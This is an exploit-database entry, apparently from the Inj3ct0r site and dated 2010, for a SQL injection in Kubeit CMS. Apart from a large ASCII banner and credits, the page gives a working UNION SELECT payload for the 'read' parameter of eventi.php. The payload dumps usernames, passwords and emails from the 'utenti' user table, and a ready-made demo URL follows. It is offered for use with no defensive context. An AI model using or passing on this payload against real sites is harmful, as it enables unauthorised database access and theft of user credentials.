[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Kubeit CMS Remote SQL Injection Vulnerability
# Published : 2010-04-08
# Author : Phenom
# Previous Title : Joomla Component AWDwall-Joomla LFI & SQLi [cbuser] Vulnerability
# Next Title : Espinas CMS SQL Injection Vulnerability
=============================================
Kubeit CMS Remote SQL Injection Vulnerability
=============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / __ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm Phenom member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered by: Phenom
#[Exploit Title] : Kubeit CMS Remote SQL Injection Vulnerability
[Author] = Phenom
[Date] = 2010-04-08
#[Exploit] :
[Bug] = eventi.php?read=[SQL]
[SQL] = 999+union+select+1,2,group_concat(concat(username,0x3a,password,0x3a,email) separator 0x3c62723e),4,5+from+utenti--
#[Demo] :
[+] http://127.0.0.1/eventi.php?read=-999+union+select+1,2,group_concat(concat(username,0x3a,password,0x3a,email) separator 0x3c62723e),4,5+from+utenti--
#[Thanks] :
[+] all Inj3ct0r Members! Inj3ct0r.com largest Exploit Database in the world =]
# Inj3ct0r.com [2010-04-08]